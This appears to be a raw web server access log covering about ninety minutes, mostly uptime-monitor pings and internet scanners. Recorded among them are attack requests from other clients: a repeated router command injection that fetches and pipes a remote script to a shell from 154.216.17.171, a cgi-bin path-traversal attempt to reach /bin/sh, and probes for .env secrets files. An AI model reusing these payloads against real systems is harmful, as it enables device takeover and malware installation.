80.82.77.202 - - [01/Sep/2024:19:47:57 +0200] "\x16\x03\x02\x01o\x01" 501 321 "-" "-"
80.82.77.202 - - [01/Sep/2024:19:48:01 +0200] "\x16\x03\x02\x01o\x01" 501 321 "-" "-"
80.82.77.202 - - [01/Sep/2024:19:48:23 +0200] "\x16\x03\x02\x01o\x01" 501 321 "-" "-"
212.91.246.72 - - [01/Sep/2024:19:48:49 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
80.82.77.202 - - [01/Sep/2024:19:48:54 +0200] "\x16\x03\x02\x01o\x01" 501 321 "-" "-"
80.82.77.202 - - [01/Sep/2024:19:48:55 +0200] "\x16\x03\x02\x01o\x01" 501 321 "-" "-"
80.82.77.202 - - [01/Sep/2024:19:49:40 +0200] "\x16\x03\x02\x01o\x01" 501 321 "-" "-"
80.82.77.202 - - [01/Sep/2024:19:49:48 +0200] "\x16\x03\x02\x01o\x01" 501 321 "-" "-"
212.91.246.72 - - [01/Sep/2024:19:49:49 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
80.82.77.202 - - [01/Sep/2024:19:50:23 +0200] "\x16\x03\x02\x01o\x01" 501 321 "-" "-"
80.82.77.202 - - [01/Sep/2024:19:50:25 +0200] "\x16\x03\x02\x01o\x01" 501 321 "-" "-"
212.91.246.72 - - [01/Sep/2024:19:50:49 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
154.216.20.249 - - [01/Sep/2024:19:50:57 +0200] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30"
154.216.20.249 - - [01/Sep/2024:19:50:57 +0200] "POST / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30"
124.158.13.251 - - [01/Sep/2024:19:51:40 +0200] "POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1" 400 333 "-" "Custom-AsyncHttpClient"
212.91.246.72 - - [01/Sep/2024:19:51:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Sep/2024:19:52:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.224.128.59 - - [01/Sep/2024:19:53:20 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60wget+-O-+http%3A%2F%2F154.216.17.171%3A88%2Ft%7Csh%3B%60) HTTP/1.1" 404 331 "-" "Go-http-client/1.1"
212.91.246.72 - - [01/Sep/2024:19:53:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.191.126.213 - - [01/Sep/2024:19:54:39 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [01/Sep/2024:19:54:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Sep/2024:19:55:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Sep/2024:19:56:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Sep/2024:19:57:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Sep/2024:19:58:51 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Sep/2024:19:59:51 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Sep/2024:20:00:51 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Sep/2024:20:01:51 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Sep/2024:20:02:51 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Sep/2024:20:03:51 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Sep/2024:20:04:52 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Sep/2024:20:05:52 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Sep/2024:20:06:52 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Sep/2024:20:07:52 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Sep/2024:20:08:52 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.191.126.213 - - [01/Sep/2024:20:09:07 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [01/Sep/2024:20:09:52 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Sep/2024:20:10:52 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.191.126.213 - - [01/Sep/2024:20:11:28 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [01/Sep/2024:20:11:53 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Sep/2024:20:12:53 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.191.126.213 - - [01/Sep/2024:20:13:41 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [01/Sep/2024:20:13:53 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Sep/2024:20:14:53 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Sep/2024:20:15:53 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Sep/2024:20:16:53 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Sep/2024:20:17:53 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.191.126.213 - - [01/Sep/2024:20:18:51 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [01/Sep/2024:20:18:54 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.224.128.59 - - [01/Sep/2024:20:19:16 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60wget+-O-+http%3A%2F%2F154.216.17.171%3A88%2Ft%7Csh%3B%60) HTTP/1.1" 404 331 "-" "Go-http-client/1.1"
212.91.246.72 - - [01/Sep/2024:20:19:54 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Sep/2024:20:20:54 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Sep/2024:20:21:54 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.191.126.213 - - [01/Sep/2024:20:22:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [01/Sep/2024:20:22:54 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Sep/2024:20:23:54 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Sep/2024:20:24:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.224.128.59 - - [01/Sep/2024:20:25:25 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60wget+-O-+http%3A%2F%2F154.216.17.171%3A88%2Ft%7Csh%3B%60) HTTP/1.1" 404 331 "-" "Go-http-client/1.1"
212.91.246.72 - - [01/Sep/2024:20:25:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
198.235.24.119 - - [01/Sep/2024:20:25:55 +0200] "GET / HTTP/1.0" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
212.91.246.72 - - [01/Sep/2024:20:26:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Sep/2024:20:27:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Sep/2024:20:28:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Sep/2024:20:29:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.224.128.59 - - [01/Sep/2024:20:30:03 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60wget+-O-+http%3A%2F%2F154.216.17.171%3A88%2Ft%7Csh%3B%60) HTTP/1.1" 404 331 "-" "Go-http-client/1.1"
212.91.246.72 - - [01/Sep/2024:20:30:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Sep/2024:20:31:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Sep/2024:20:32:56 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Sep/2024:20:33:56 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Sep/2024:20:34:56 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Sep/2024:20:35:56 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Sep/2024:20:36:56 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Sep/2024:20:37:56 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
159.223.182.81 - - [01/Sep/2024:20:38:52 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
159.223.182.81 - - [01/Sep/2024:20:38:52 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "http://212.91.246.81/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
212.91.246.72 - - [01/Sep/2024:20:38:56 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Sep/2024:20:39:56 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
89.190.156.137 - - [01/Sep/2024:20:40:52 +0200] "GET / HTTP/1.0" 200 1229 "-" "ivre-masscan/1.3 https://github.com/robertdavidgraham/"
212.91.246.72 - - [01/Sep/2024:20:40:57 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Sep/2024:20:41:57 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.224.128.59 - - [01/Sep/2024:20:42:34 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60wget+-O-+http%3A%2F%2F154.216.17.171%3A88%2Ft%7Csh%3B%60) HTTP/1.1" 404 331 "-" "Go-http-client/1.1"
212.91.246.72 - - [01/Sep/2024:20:42:57 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
89.190.156.137 - - [01/Sep/2024:20:43:14 +0200] "GET / HTTP/1.0" 200 1229 "-" "ivre-masscan/1.3 https://github.com/robertdavidgraham/"
212.91.246.72 - - [01/Sep/2024:20:43:57 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Sep/2024:20:44:57 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.191.126.213 - - [01/Sep/2024:20:45:00 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [01/Sep/2024:20:45:57 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.224.128.59 - - [01/Sep/2024:20:46:44 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60wget+-O-+http%3A%2F%2F154.216.17.171%3A88%2Ft%7Csh%3B%60) HTTP/1.1" 404 331 "-" "Go-http-client/1.1"
185.191.126.213 - - [01/Sep/2024:20:46:49 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [01/Sep/2024:20:46:57 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Sep/2024:20:47:58 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.224.128.59 - - [01/Sep/2024:20:48:23 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60wget+-O-+http%3A%2F%2F154.216.17.171%3A88%2Ft%7Csh%3B%60) HTTP/1.1" 404 331 "-" "Go-http-client/1.1"
89.190.156.137 - - [01/Sep/2024:20:48:50 +0200] "GET / HTTP/1.0" 200 1229 "-" "ivre-masscan/1.3 https://github.com/robertdavidgraham/"
212.91.246.72 - - [01/Sep/2024:20:48:58 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Sep/2024:20:49:58 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Sep/2024:20:50:58 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
80.82.77.202 - - [01/Sep/2024:20:51:10 +0200] "GET / HTTP/1.0" 200 1229 "-" "HTC-ST7377/1.59.502.3 (67150) Opera/9.50 (Windows NT 5.1; U; en) UP.Link/6.3.1.17.0"
80.82.77.202 - - [01/Sep/2024:20:51:42 +0200] "GET / HTTP/1.0" 200 1229 "-" "HTC-ST7377/1.59.502.3 (67150) Opera/9.50 (Windows NT 5.1; U; en) UP.Link/6.3.1.17.0"
212.91.246.72 - - [01/Sep/2024:20:51:58 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.224.128.59 - - [01/Sep/2024:20:52:49 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60wget+-O-+http%3A%2F%2F154.216.17.171%3A88%2Ft%7Csh%3B%60) HTTP/1.1" 404 331 "-" "Go-http-client/1.1"
212.91.246.72 - - [01/Sep/2024:20:52:58 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Sep/2024:20:53:59 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Sep/2024:20:54:59 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Sep/2024:20:55:59 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
168.62.211.180 - - [01/Sep/2024:20:56:30 +0200] "GET echo -e \"GET h://[f] HTTP/1.1" 400 329 "-" "-"
212.91.246.72 - - [01/Sep/2024:20:56:59 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Sep/2024:20:57:59 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Sep/2024:20:58:59 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
89.190.156.137 - - [01/Sep/2024:20:59:24 +0200] "GET / HTTP/1.0" 200 1229 "-" "ivre-masscan/1.3 https://github.com/robertdavidgraham/"
89.190.156.137 - - [01/Sep/2024:20:59:55 +0200] "GET / HTTP/1.0" 200 1229 "-" "ivre-masscan/1.3 https://github.com/robertdavidgraham/"
212.91.246.72 - - [01/Sep/2024:21:00:00 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Sep/2024:21:01:00 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
95.214.55.138 - - [01/Sep/2024:21:01:45 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
212.91.246.72 - - [01/Sep/2024:21:02:00 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
95.214.55.138 - - [01/Sep/2024:21:02:10 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
89.190.156.137 - - [01/Sep/2024:21:02:23 +0200] "GET / HTTP/1.0" 200 1229 "-" "ivre-masscan/1.3 https://github.com/robertdavidgraham/"
212.91.246.72 - - [01/Sep/2024:21:03:00 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Sep/2024:21:04:00 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.191.126.213 - - [01/Sep/2024:21:04:38 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [01/Sep/2024:21:05:00 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Sep/2024:21:06:00 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Sep/2024:21:07:01 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
95.214.55.138 - - [01/Sep/2024:21:07:08 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
89.190.156.137 - - [01/Sep/2024:21:07:10 +0200] "GET / HTTP/1.0" 200 1229 "-" "ivre-masscan/1.3 https://github.com/robertdavidgraham/"
154.216.20.249 - - [01/Sep/2024:21:07:14 +0200] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30"
167.94.145.107 - - [01/Sep/2024:21:07:14 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
167.94.145.107 - - [01/Sep/2024:21:07:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.94.145.107 - - [01/Sep/2024:21:07:18 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
154.216.20.249 - - [01/Sep/2024:21:07:18 +0200] "POST / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30"
167.94.145.107 - - [01/Sep/2024:21:07:18 +0200] "PRI * HTTP/2.0" 400 329 "-" "-"
212.91.246.72 - - [01/Sep/2024:21:08:01 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.224.128.59 - - [01/Sep/2024:21:08:34 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60wget+-O-+http%3A%2F%2F154.216.17.171%3A88%2Ft%7Csh%3B%60) HTTP/1.1" 404 331 "-" "Go-http-client/1.1"
185.191.126.213 - - [01/Sep/2024:21:08:38 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [01/Sep/2024:21:09:01 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Sep/2024:21:10:01 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Sep/2024:21:11:01 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
205.210.31.155 - - [01/Sep/2024:21:11:45 +0200] "GET / HTTP/1.0" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
212.91.246.72 - - [01/Sep/2024:21:12:01 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
89.190.156.137 - - [01/Sep/2024:21:12:28 +0200] "GET / HTTP/1.0" 200 1229 "-" "ivre-masscan/1.3 https://github.com/robertdavidgraham/"
212.91.246.72 - - [01/Sep/2024:21:13:01 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.191.126.213 - - [01/Sep/2024:21:13:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
185.191.126.213 - - [01/Sep/2024:21:13:56 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [01/Sep/2024:21:14:01 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Sep/2024:21:15:01 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
207.90.244.5 - - [01/Sep/2024:21:15:32 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36"
207.90.244.5 - - [01/Sep/2024:21:15:32 +0200] "GET /robots.txt HTTP/1.1" 404 315 "-" "-"
207.90.244.5 - - [01/Sep/2024:21:15:32 +0200] "GET /sitemap.xml HTTP/1.1" 404 316 "-" "-"
207.90.244.5 - - [01/Sep/2024:21:15:32 +0200] "GET /.well-known/security.txt HTTP/1.1" 404 329 "-" "-"
207.90.244.5 - - [01/Sep/2024:21:15:33 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36"
212.91.246.72 - - [01/Sep/2024:21:16:01 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Sep/2024:21:17:02 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Sep/2024:21:18:02 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Sep/2024:21:19:02 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
89.190.156.137 - - [01/Sep/2024:21:19:42 +0200] "GET / HTTP/1.0" 200 1229 "-" "ivre-masscan/1.3 https://github.com/robertdavidgraham/"
212.91.246.72 - - [01/Sep/2024:21:20:02 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
95.214.55.138 - - [01/Sep/2024:21:20:52 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
212.91.246.72 - - [01/Sep/2024:21:21:02 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Sep/2024:21:22:02 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
